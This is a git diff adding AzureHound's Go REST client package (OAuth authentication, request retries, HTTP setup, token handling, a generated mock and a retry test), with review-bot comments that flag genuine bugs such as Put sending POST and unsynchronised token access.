@@ -0,0 +1,313 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package rest
+
+//go:generate go run go.uber.org/mock/mockgen -destination=./mocks/client.go -package=mocks . RestClient
+
+import (
+ "bytes"
+ "context"
+ "encoding/json"
+ "fmt"
+ "io"
+ "net/http"
+ "net/url"
+ "strconv"
+ "sync"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client/config"
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+)
+
+type RestClient interface {
+ Authenticate() error
+ Delete(ctx context.Context, path string, body interface{}, params query.Params, headers map[string]string) (*http.Response, error)
+ Get(ctx context.Context, path string, params query.Params, headers map[string]string) (*http.Response, error)
+ Patch(ctx context.Context, path string, body interface{}, params query.Params, headers map[string]string) (*http.Response, error)
+ Post(ctx context.Context, path string, body interface{}, params query.Params, headers map[string]string) (*http.Response, error)
+ Put(ctx context.Context, path string, body interface{}, params query.Params, headers map[string]string) (*http.Response, error)
+ Send(req *http.Request) (*http.Response, error)
+ CloseIdleConnections()
+}
+
+func NewRestClient(apiUrl string, config config.Config) (RestClient, error) {
+ if auth, err := url.Parse(config.AuthorityUrl()); err != nil {
+ return nil, err
+ } else if api, err := url.Parse(apiUrl); err != nil {
+ return nil, err
+ } else if http, err := NewHTTPClient(config.ProxyUrl); err != nil {
+ return nil, err
+ } else {
+ client := &restClient{
+ *api,
+ *auth,
+ config.JWT,
+ config.ApplicationId,
+ config.ClientSecret,
+ config.ClientCert,
+ config.ClientKey,
+ config.ClientKeyPass,
+ config.Username,
+ config.Password,
+ http,
+ sync.RWMutex{},
+ config.RefreshToken,
+ config.Tenant,
+ Token{},
+ config.SubscriptionId,
+ config.MgmtGroupId,
+ }
+ return client, nil
+ }
+}
+
+type restClient struct {
+ api url.URL
+ authUrl url.URL
+ jwt string
+ clientId string
+ clientSecret string
+ clientCert string
+ clientKey string
+ clientKeyPass string
+ username string
+ password string
+ http *http.Client
+ mutex sync.RWMutex
+ refreshToken string
+ tenant string
+ token Token
+ subId []string
+ mgmtGroupId []string
+}
+
+func (s *restClient) Authenticate() error {
+ var (
+ path = url.URL{Path: fmt.Sprintf("/%s/oauth2/v2.0/token", s.tenant)}
+ endpoint = s.authUrl.ResolveReference(&path)
+ defaultScope = url.URL{Path: "/.default"}
+ scope = s.api.ResolveReference(&defaultScope)
+ body = url.Values{}
+ )
+
+ if s.clientId == "" {
+ body.Add("client_id", constants.AzPowerShellClientID)
+ } else {
+ body.Add("client_id", s.clientId)
+ }
+
+ body.Add("scope", scope.ResolveReference(&defaultScope).String())
+
+ if s.refreshToken != "" {
+ body.Add("grant_type", "refresh_token")
+ body.Add("refresh_token", s.refreshToken)
+ body.Set("client_id", constants.AzPowerShellClientID)
+ } else if s.clientSecret != "" {
+ body.Add("grant_type", "client_credentials")
+ body.Add("client_secret", s.clientSecret)
+ } else if s.clientCert != "" && s.clientKey != "" {
+ if clientAssertion, err := NewClientAssertion(endpoint.String(), s.clientId, s.clientCert, s.clientKey, s.clientKeyPass); err != nil {
+ return err
+ } else {
+ body.Add("grant_type", "client_credentials")
+ body.Add("client_assertion_type", "urn:ietf:params:oauth:client-assertion-type:jwt-bearer")
+ body.Add("client_assertion", clientAssertion)
+ }
+ } else if s.username != "" && s.password != "" {
+ body.Add("grant_type", "password")
+ body.Add("username", s.username)
+ body.Add("password", s.password)
+ body.Set("client_id", constants.AzPowerShellClientID)
+ } else {
+ return fmt.Errorf("unable to authenticate. no valid credential provided")
+ }
+
+ if req, err := NewRequest(context.Background(), "POST", endpoint, body, nil, nil); err != nil {
+ return err
+ } else if res, err := s.send(req); err != nil {
+ return err
+ } else {
+ defer res.Body.Close()
+ s.mutex.Lock()
+ defer s.mutex.Unlock()
+ if err := json.NewDecoder(res.Body).Decode(&s.token); err != nil {
+ return err
+ } else {
+ return nil
+ }
+ }
+}
+
+func (s *restClient) Delete(ctx context.Context, path string, body interface{}, params query.Params, headers map[string]string) (*http.Response, error) {
+ endpoint := s.api.ResolveReference(&url.URL{Path: path})
+ paramsMap := make(map[string]string)
+ if params != nil {
+ paramsMap = params.AsMap()
+ }
+ if req, err := NewRequest(ctx, http.MethodDelete, endpoint, body, paramsMap, headers); err != nil {
+ return nil, err
+ } else {
+ return s.Send(req)
+ }
+}
+
+func (s *restClient) Get(ctx context.Context, path string, params query.Params, headers map[string]string) (*http.Response, error) {
+ endpoint := s.api.ResolveReference(&url.URL{Path: path})
+ paramsMap := make(map[string]string)
+
+ if params != nil {
+ paramsMap = params.AsMap()
+ if params.NeedsEventualConsistencyHeaderFlag() {
+ if headers == nil {
+ headers = make(map[string]string)
+ }
+ headers["ConsistencyLevel"] = "eventual"
+ }
+ }
+
+ if req, err := NewRequest(ctx, http.MethodGet, endpoint, nil, paramsMap, headers); err != nil {
+ return nil, err
+ } else {
+ return s.Send(req)
+ }
+}
+
+func (s *restClient) Patch(ctx context.Context, path string, body interface{}, params query.Params, headers map[string]string) (*http.Response, error) {
+ endpoint := s.api.ResolveReference(&url.URL{Path: path})
+ paramsMap := make(map[string]string)
+ if params != nil {
+ paramsMap = params.AsMap()
+ }
+ if req, err := NewRequest(ctx, http.MethodPatch, endpoint, body, paramsMap, headers); err != nil {
+ return nil, err
+ } else {
+ return s.Send(req)
+ }
+}
+
+func (s *restClient) Post(ctx context.Context, path string, body interface{}, params query.Params, headers map[string]string) (*http.Response, error) {
+ endpoint := s.api.ResolveReference(&url.URL{Path: path})
+ paramsMap := make(map[string]string)
+ if params != nil {
+ paramsMap = params.AsMap()
+ }
+ if req, err := NewRequest(ctx, http.MethodPost, endpoint, body, paramsMap, headers); err != nil {
+ return nil, err
+ } else {
+ return s.Send(req)
+ }
+}
+
+func (s *restClient) Put(ctx context.Context, path string, body interface{}, params query.Params, headers map[string]string) (*http.Response, error) {
+ endpoint := s.api.ResolveReference(&url.URL{Path: path})
+ paramsMap := make(map[string]string)
+ if params != nil {
+ paramsMap = params.AsMap()
+ }
+ if req, err := NewRequest(ctx, http.MethodPost, endpoint, body, paramsMap, headers); err != nil {
+ return nil, err
+ } else {
+ return s.Send(req)
+ }
+}
+
+func (s *restClient) Send(req *http.Request) (*http.Response, error) {
+ if s.jwt != "" {
+ if aud, err := ParseAud(s.jwt); err != nil {
+ return nil, err
+ } else if aud != s.api.String() {
+ return nil, fmt.Errorf("invalid audience")
+ }
+ req.Header.Set("Authorization", fmt.Sprintf("Bearer %s", s.jwt))
+ } else {
+ if s.token.IsExpired() {
+ if err := s.Authenticate(); err != nil {
+ return nil, err
+ }
+ }
+ req.Header.Set("Authorization", s.token.String())
+ }
+ return s.send(req)
+}
+
+func (s *restClient) send(req *http.Request) (*http.Response, error) {
+ // copy the bytes in case we need to retry the request
+ if body, err := CopyBody(req); err != nil {
+ return nil, err
+ } else {
+ var (
+ res *http.Response
+ err error
+ maxRetries = 3
+ )
+ // Try the request up to a set number of times
+ for retry := 0; retry < maxRetries; retry++ {
+
+ // Reusing http.Request requires rewinding the request body
+ // back to a working state
+ if body != nil && retry > 0 {
+ req.Body = io.NopCloser(bytes.NewBuffer(body))
+ }
+
+ // Try the request
+ if res, err = s.http.Do(req); err != nil {
+ if IsClosedConnectionErr(err) {
+ fmt.Printf("remote host force closed connection while requesting %s; attempt %d/%d; trying again\n", req.URL, retry+1, maxRetries)
+ ExponentialBackoff(retry)
+ continue
+ }
+ return nil, err
+ } else if res.StatusCode < http.StatusOK || res.StatusCode >= http.StatusBadRequest {
+ // Error response code handling
+ // See official Retry guidance (https://learn.microsoft.com/en-us/azure/architecture/best-practices/retry-service-specific#retry-usage-guidance)
+ if res.StatusCode == http.StatusTooManyRequests {
+ retryAfterHeader := res.Header.Get("Retry-After")
+ if retryAfter, err := strconv.ParseInt(retryAfterHeader, 10, 64); err != nil {
+ return nil, fmt.Errorf("attempting to handle 429 but unable to parse retry-after header: %w", err)
+ } else {
+ // Wait the time indicated in the retry-after header
+ time.Sleep(time.Second * time.Duration(retryAfter))
+ continue
+ }
+ } else if res.StatusCode >= http.StatusInternalServerError {
+ // Wait the time calculated by the 5 second exponential backoff
+ ExponentialBackoff(retry)
+ continue
+ } else {
+ // Not a status code that warrants a retry
+ var errRes map[string]interface{}
+ if err := Decode(res.Body, &errRes); err != nil {
+ return nil, fmt.Errorf("malformed error response, status code: %d", res.StatusCode)
+ } else {
+ return nil, fmt.Errorf("%v", errRes)
+ }
+ }
+ } else {
+ // Response OK
+ return res, nil
+ }
+ }
+ return nil, fmt.Errorf("unable to complete the request after %d attempts: %w", maxRetries, err)
+ }
+}
+
+func (s *restClient) CloseIdleConnections() {
+ s.http.CloseIdleConnections()
+}
diff --git a/client/rest/client_test.go b/client/rest/client_test.go
new file mode 100644
index 0000000..4be3273
--- /dev/null
+++ b/client/rest/client_test.go
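Review bot: `Put` builds its request with `http.MethodPost`, so every PUT goes out as a POST; the call should read `NewRequest(ctx, http.MethodPut, endpoint, body, paramsMap, headers)`. `Send` reads `s.token` (`IsExpired`, `String`) without holding `s.mutex` while `Authenticate` writes it under `s.mutex.Lock()`, which is a data race once requests run concurrently; copy the token under `s.mutex.RLock()` and release the lock before calling `Authenticate`. In `send`, the 429 and 5xx branches `continue` without closing `res.Body`, so each retried response keeps its connection out of the pool; call `res.Body.Close()` before sleeping. When the last attempt ends in a 5xx, `err` is nil at the final `fmt.Errorf("... %w", maxRetries, err)`, so the returned error carries no status code. `Authenticate` also builds its request with `context.Background()`, so a token request cannot be cancelled by the caller.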
@@ -0,0 +1,69 @@
+// Copyright (C) 2024 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package rest
+
+import (
+ "net/http"
+ "net/http/httptest"
+
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client/config"
+)
+
+func TestClosedConnection(t *testing.T) {
+ var testServer *httptest.Server
+ attempt := 0
+ var mockHandler http.HandlerFunc = func(w http.ResponseWriter, r *http.Request) {
+ attempt++
+ testServer.CloseClientConnections()
+ }
+
+ testServer = httptest.NewServer(mockHandler)
+ defer testServer.Close()
+
+ defaultConfig := config.Config{
+ Username: "azurehound",
+ Password: "we_collect",
+ Authority: testServer.URL,
+ }
+
+ if client, err := NewRestClient(testServer.URL, defaultConfig); err != nil {
+ t.Fatalf("error initializing rest client %v", err)
+ } else {
+ requestCompleted := false
+
+ // make request in separate goroutine so its not blocking after we validated the retry
+ go func() {
+ client.Authenticate() // Authenticate() because it uses the internal client.send method.
+ // CloseClientConnections should block the request from completing, however if it completes then the test fails.
+ requestCompleted = true
+ }()
+
+ // block until attempt is > 2 or request succeeds
+ for attempt <= 2 {
+ if attempt > 1 || requestCompleted {
+ break
+ }
+ }
+
+ if requestCompleted {
+ t.Fatalf("expected an attempted retry but the request completed")
+ }
+ }
+}
diff --git a/client/rest/http.go b/client/rest/http.go
new file mode 100644
index 0000000..cc729fe
--- /dev/null
+++ b/client/rest/http.go
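Review bot: `attempt` and `requestCompleted` are written from the server handler goroutine and from the `go func()` and read in the spin loop with no synchronization, so the test is a data race under `go test -race` and the loop is not guaranteed to observe either write. Declare `var attempt atomic.Int32` and call `attempt.Add(1)` in the handler, signal completion by closing a `done` channel, and replace the busy loop with a `select` that also has a timeout so a regression fails instead of hanging. The loop header `for attempt <= 2` decides nothing because the body already breaks at `attempt > 1`; stating the expected retry count once would make the assertion clear. The error returned by `client.Authenticate()` is discarded, so the test cannot distinguish a retry from an unrelated failure.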
@@ -0,0 +1,135 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package rest
+
+import (
+ "bytes"
+ "context"
+ "crypto/tls"
+ "encoding/json"
+ "io"
+ "net/http"
+ "net/http/cookiejar"
+ "net/url"
+ "strings"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+)
+
+func NewHTTPClient(proxyUrl string) (*http.Client, error) {
+ transport := http.DefaultTransport.(*http.Transport).Clone()
+ transport.MaxConnsPerHost = config.ColMaxConnsPerHost.Value().(int)
+ transport.MaxIdleConnsPerHost = config.ColMaxIdleConnsPerHost.Value().(int)
+ transport.DisableKeepAlives = false
+
+ // defaults to TLS 1.0 which is not favorable
+ transport.TLSClientConfig = &tls.Config{
+ MinVersion: tls.VersionTLS12,
+ }
+
+ // increasing timeout because tls handshakes can take longer when doing a lot of concurrent calls
+ transport.TLSHandshakeTimeout = 20 * time.Second
+
+ // increasing response header timeout to accout for WAF throttling rules
+ transport.ResponseHeaderTimeout = 5 * time.Minute
+
+ // ignoring err; always nil
+ jar, _ := cookiejar.New(nil)
+
+ // setup forward proxy
+ if proxyUrl != "" {
+ if url, err := url.Parse(proxyUrl); err != nil {
+ return nil, err
+ } else {
+ transport.Proxy = http.ProxyURL(url)
+ }
+ }
+
+ return &http.Client{
+ Jar: jar,
+ Transport: transport,
+ }, nil
+}
+
+func NewRequest(
+ ctx context.Context,
+ verb string,
+ endpoint *url.URL,
+ body interface{},
+ params map[string]string,
+ headers map[string]string,
+) (*http.Request, error) {
+ // set query params
+ if params != nil {
+ q := endpoint.Query()
+ for key, value := range params {
+ q.Set(key, value)
+ }
+ endpoint.RawQuery = q.Encode()
+ }
+
+ // set body
+ var (
+ reader io.Reader
+ buffer = &bytes.Buffer{}
+ )
+ if body != nil {
+ switch body := body.(type) {
+ case url.Values:
+ reader = strings.NewReader(body.Encode())
+ default:
+ data := new(bytes.Buffer)
+ if err := json.NewEncoder(data).Encode(body); err != nil {
+ return nil, err
+ } else {
+ reader = data
+ }
+ }
+ buffer.ReadFrom(reader)
+ }
+
+ if req, err := http.NewRequestWithContext(ctx, verb, endpoint.String(), buffer); err != nil {
+ return nil, err
+ } else {
+ // set headers
+ for key, value := range headers {
+ req.Header.Set(key, value)
+ }
+
+ // set content-type
+ if body != nil {
+ switch body.(type) {
+ case url.Values:
+ req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
+ default:
+ req.Header.Set("Content-Type", "application/json")
+ }
+ }
+
+ // set default accept type
+ if req.Header.Get("Accept") == "" {
+ req.Header.Set("Accept", "application/json")
+ }
+
+ // set azurehound as user-agent
+ req.Header.Set("User-Agent", constants.UserAgent())
+ return req, nil
+ }
+}
diff --git a/client/rest/mocks/client.go b/client/rest/mocks/client.go
new file mode 100644
index 0000000..6c2f7ae
--- /dev/null
+++ b/client/rest/mocks/client.go
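Review bot: The comment `// defaults to TLS 1.0 which is not favorable` above `transport.TLSClientConfig` is out of date for current Go releases, where the client default minimum is already TLS 1.2; reword it to `// pin the minimum TLS version explicitly instead of relying on the toolchain default`. The returned `http.Client` sets no `Timeout`, and `ResponseHeaderTimeout` covers only the wait for response headers, so a request made without a context deadline can block while the body is read; either document that callers must pass a deadline or set a client timeout. In `NewRequest` the result of `buffer.ReadFrom(reader)` is ignored, and the JSON case encodes into `data` only to copy it into `buffer`; encoding straight into `buffer` removes both the copy and the unchecked error.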
@@ -0,0 +1,153 @@ +// Code generated by MockGen. DO NOT EDIT. +// Source: github.com/bloodhoundad/azurehound/v2/client/rest (interfaces: RestClient) + +// Package mocks is a generated GoMock package. +package mocks + +import ( + context "context" + http "net/http" + reflect "reflect" + + query "github.com/bloodhoundad/azurehound/v2/client/query" + gomock "go.uber.org/mock/gomock" +) + +// MockRestClient is a mock of RestClient interface. +type MockRestClient struct { + ctrl *gomock.Controller + recorder *MockRestClientMockRecorder +} + +// MockRestClientMockRecorder is the mock recorder for MockRestClient. +type MockRestClientMockRecorder struct { + mock *MockRestClient +} + +// NewMockRestClient creates a new mock instance. +func NewMockRestClient(ctrl *gomock.Controller) *MockRestClient { + mock := &MockRestClient{ctrl: ctrl} + mock.recorder = &MockRestClientMockRecorder{mock} + return mock +} + +// EXPECT returns an object that allows the caller to indicate expected use. +func (m *MockRestClient) EXPECT() *MockRestClientMockRecorder { + return m.recorder +} + +// Authenticate mocks base method. +func (m *MockRestClient) Authenticate() error { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "Authenticate") + ret0, _ := ret[0].(error) + return ret0 +} + +// Authenticate indicates an expected call of Authenticate. +func (mr *MockRestClientMockRecorder) Authenticate() *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "Authenticate", reflect.TypeOf((*MockRestClient)(nil).Authenticate)) +} + +// CloseIdleConnections mocks base method. +func (m *MockRestClient) CloseIdleConnections() { + m.ctrl.T.Helper() + m.ctrl.Call(m, "CloseIdleConnections") +} + +// CloseIdleConnections indicates an expected call of CloseIdleConnections. 
+func (mr *MockRestClientMockRecorder) CloseIdleConnections() *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CloseIdleConnections", reflect.TypeOf((*MockRestClient)(nil).CloseIdleConnections)) +} + +// Delete mocks base method. +func (m *MockRestClient) Delete(arg0 context.Context, arg1 string, arg2 interface{}, arg3 query.Params, arg4 map[string]string) (*http.Response, error) { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "Delete", arg0, arg1, arg2, arg3, arg4) + ret0, _ := ret[0].(*http.Response) + ret1, _ := ret[1].(error) + return ret0, ret1 +} + +// Delete indicates an expected call of Delete. +func (mr *MockRestClientMockRecorder) Delete(arg0, arg1, arg2, arg3, arg4 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "Delete", reflect.TypeOf((*MockRestClient)(nil).Delete), arg0, arg1, arg2, arg3, arg4) +} + +// Get mocks base method. +func (m *MockRestClient) Get(arg0 context.Context, arg1 string, arg2 query.Params, arg3 map[string]string) (*http.Response, error) { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "Get", arg0, arg1, arg2, arg3) + ret0, _ := ret[0].(*http.Response) + ret1, _ := ret[1].(error) + return ret0, ret1 +} + +// Get indicates an expected call of Get. +func (mr *MockRestClientMockRecorder) Get(arg0, arg1, arg2, arg3 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "Get", reflect.TypeOf((*MockRestClient)(nil).Get), arg0, arg1, arg2, arg3) +} + +// Patch mocks base method. +func (m *MockRestClient) Patch(arg0 context.Context, arg1 string, arg2 interface{}, arg3 query.Params, arg4 map[string]string) (*http.Response, error) { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "Patch", arg0, arg1, arg2, arg3, arg4) + ret0, _ := ret[0].(*http.Response) + ret1, _ := ret[1].(error) + return ret0, ret1 +} + +// Patch indicates an expected call of Patch. 
+func (mr *MockRestClientMockRecorder) Patch(arg0, arg1, arg2, arg3, arg4 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "Patch", reflect.TypeOf((*MockRestClient)(nil).Patch), arg0, arg1, arg2, arg3, arg4) +} + +// Post mocks base method. +func (m *MockRestClient) Post(arg0 context.Context, arg1 string, arg2 interface{}, arg3 query.Params, arg4 map[string]string) (*http.Response, error) { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "Post", arg0, arg1, arg2, arg3, arg4) + ret0, _ := ret[0].(*http.Response) + ret1, _ := ret[1].(error) + return ret0, ret1 +} + +// Post indicates an expected call of Post. +func (mr *MockRestClientMockRecorder) Post(arg0, arg1, arg2, arg3, arg4 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "Post", reflect.TypeOf((*MockRestClient)(nil).Post), arg0, arg1, arg2, arg3, arg4) +} + +// Put mocks base method. +func (m *MockRestClient) Put(arg0 context.Context, arg1 string, arg2 interface{}, arg3 query.Params, arg4 map[string]string) (*http.Response, error) { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "Put", arg0, arg1, arg2, arg3, arg4) + ret0, _ := ret[0].(*http.Response) + ret1, _ := ret[1].(error) + return ret0, ret1 +} + +// Put indicates an expected call of Put. +func (mr *MockRestClientMockRecorder) Put(arg0, arg1, arg2, arg3, arg4 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "Put", reflect.TypeOf((*MockRestClient)(nil).Put), arg0, arg1, arg2, arg3, arg4) +} + +// Send mocks base method. +func (m *MockRestClient) Send(arg0 *http.Request) (*http.Response, error) { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "Send", arg0) + ret0, _ := ret[0].(*http.Response) + ret1, _ := ret[1].(error) + return ret0, ret1 +} + +// Send indicates an expected call of Send. 
+func (mr *MockRestClientMockRecorder) Send(arg0 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "Send", reflect.TypeOf((*MockRestClient)(nil).Send), arg0) +} diff --git a/client/rest/token.go b/client/rest/token.go new file mode 100644 index 0000000..16e9257 --- /dev/null +++ b/client/rest/token.go 
@@ -0,0 +1,58 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package rest
+
+import (
+ "encoding/json"
+ "fmt"
+ "time"
+)
+
+type Token struct {
+ accessToken string
+ expiresIn int
+ extExpiresIn int
+ expires time.Time
+}
+
+func (s Token) IsExpired() bool {
+ return time.Now().After(s.expires.Add(-10 * time.Second))
+}
+
+func (s Token) String() string {
+ return fmt.Sprintf("Bearer %s", s.accessToken)
+}
+
+func (s *Token) UnmarshalJSON(data []byte) error {
+ var res struct {
+ AccessToken string `json:"access_token"` // The token to use in calls to Microsoft Graph API
+ ExpiresIn int `json:"expires_in"` // How long the access token is valid in seconds
+ ExtExpiresIn int `json:"ext_expires_in"` // How long the access token is valid in seconds
+ TokenType string `json:"token_type"` // Indicates the token type value. The only type currently supported by Azure AD is `bearer`
+ }
+
+ if err := json.Unmarshal(data, &res); err != nil {
+ return err
+ } else {
+ s.accessToken = res.AccessToken
+ s.expiresIn = res.ExpiresIn
+ s.extExpiresIn = res.ExtExpiresIn
+ s.expires = time.Now().Add(time.Duration(res.ExpiresIn) * time.Second)
+ return nil
+ }
+}
diff --git a/client/rest/utils.go b/client/rest/utils.go
new file mode 100644
index 0000000..ed3b85e
--- /dev/null
+++ b/client/rest/utils.go
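Review bot: `Token.String()` returns the bearer credential, which makes `Token` a `fmt.Stringer`, so formatting a `Token` with `%v` or `%s` in a log line or error message prints the access token. Rename the method to something explicit such as `AuthorizationHeader()` (its caller, `restClient.Send`, is outside this hunk) and, if a `String` method is kept, have it return a redacted form like `"Bearer [redacted]"`. `UnmarshalJSON` accepts a response with an empty `access_token` and ignores `token_type`; returning an error when `res.AccessToken == ""` would stop an empty `Authorization: Bearer ` header from being sent. The type and its methods have no doc comments, and the 10-second margin in `IsExpired` deserves a one-line explanation.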
@@ -0,0 +1,152 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package rest
+
+import (
+ "bytes"
+ "crypto/sha1"
+ "crypto/x509"
+ "encoding/base64"
+ "encoding/json"
+ "encoding/pem"
+ "fmt"
+ "io"
+ "math"
+ "net/http"
+ "strings"
+ "time"
+
+ "github.com/gofrs/uuid"
+ "github.com/golang-jwt/jwt"
+ "github.com/youmark/pkcs8"
+)
+
+func Decode(body io.ReadCloser, v interface{}) error {
+ defer body.Close()
+ defer io.ReadAll(body) // must read all; streaming to the json decoder does not read to EOF making the connection unavailable for reuse
+ return json.NewDecoder(body).Decode(v)
+}
+
+func NewClientAssertion(tokenUrl string, clientId string, clientCert string, signingKey string, keyPassphrase string) (string, error) {
+ if key, err := parseRSAPrivateKey(signingKey, keyPassphrase); err != nil {
+ return "", fmt.Errorf("Unable to parse private key: %w", err)
+ } else if jti, err := uuid.NewV4(); err != nil {
+ return "", fmt.Errorf("Unable to generate JWT ID: %w", err)
+ } else if thumbprint, err := x5t(clientCert); err != nil {
+ return "", fmt.Errorf("Unable to create X.509 certificate thumbprint: %w", err)
+ } else {
+ iat := time.Now()
+ exp := iat.Add(1 * time.Minute)
+ token := jwt.NewWithClaims(jwt.SigningMethodRS256, jwt.StandardClaims{
+ Audience: tokenUrl,
+ ExpiresAt: exp.Unix(),
+ Issuer: clientId,
+ Id: jti.String(),
+ NotBefore: iat.Unix(),
+ Subject: clientId,
+ IssuedAt: iat.Unix(),
+ })
+
+ token.Header = map[string]interface{}{
+ "alg": "RS256",
+ "typ": "JWT",
+ "x5t": thumbprint,
+ }
+
+ if signedToken, err := token.SignedString(key); err != nil {
+ return "", fmt.Errorf("Unable to sign JWT: %w", err)
+ } else {
+ return signedToken, nil
+ }
+ }
+}
+
+func ParseBody(accessToken string) (map[string]interface{}, error) {
+ var (
+ body = make(map[string]interface{})
+ parts = strings.Split(accessToken, ".")
+ )
+
+ if len(parts) != 3 {
+ return body, fmt.Errorf("invalid access token")
+ } else if bytes, err := base64.RawStdEncoding.DecodeString(parts[1]); err != nil {
+ return body, err
+ } else if err := json.Unmarshal(bytes, &body); err != nil {
+ return body, err
+ } else {
+ return body, nil
+ }
+}
+
+func ParseAud(accessToken string) (string, error) {
+ if body, err := ParseBody(accessToken); err != nil {
+ return "", err
+ } else if aud, ok := body["aud"].(string); !ok {
+ return "", fmt.Errorf("invalid 'aud' type: %T", body["aud"])
+ } else {
+ return strings.TrimSuffix(aud, "/"), nil
+ }
+}
+
+func parseRSAPrivateKey(signingKey string, password string) (interface{}, error) {
+ if decodedBlock, _ := pem.Decode([]byte(signingKey)); decodedBlock == nil {
+ return nil, fmt.Errorf("Unable to decode private key")
+ } else if key, _, err := pkcs8.ParsePrivateKey(decodedBlock.Bytes, []byte(password)); err != nil {
+ return nil, err
+ } else {
+ return key, nil
+ }
+}
+
+func x5t(certificate string) (string, error) {
+ if decoded, _ := pem.Decode([]byte(certificate)); decoded == nil {
+ return "", fmt.Errorf("Unable to decode certificate")
+ } else if cert, err := x509.ParseCertificate(decoded.Bytes); err != nil {
+ return "", fmt.Errorf("Unable to parse certificate: %w", err)
+ } else {
+ checksum := sha1.Sum(cert.Raw)
+ return base64.StdEncoding.EncodeToString(checksum[:]), nil
+ }
+}
+
+func IsClosedConnectionErr(err error) bool {
+ var closedConnectionMsg = "An existing connection was forcibly closed by the remote host."
+ closedFromClient := strings.Contains(err.Error(), closedConnectionMsg)
+ // Mocking http.Do would require a larger refactor, so closedFromTestCase is used to cover testing only.
+ closedFromTestCase := strings.HasSuffix(err.Error(), ": EOF")
+ return closedFromClient || closedFromTestCase
+}
+
+func ExponentialBackoff(retry int) {
+ backoff := math.Pow(5, float64(retry+1))
+ time.Sleep(time.Second * time.Duration(backoff))
+}
+
+func CopyBody(req *http.Request) ([]byte, error) {
+ var (
+ body []byte
+ err error
+ )
+ if req.Body != nil {
+ body, err = io.ReadAll(req.Body)
+ if body != nil {
+ req.Body = io.NopCloser(bytes.NewBuffer(body))
+ }
+ }
+ return body, err
+}
diff --git a/client/role_assignments.go b/client/role_assignments.go
new file mode 100644
index 0000000..f742f54
--- /dev/null
+++ b/client/role_assignments.go
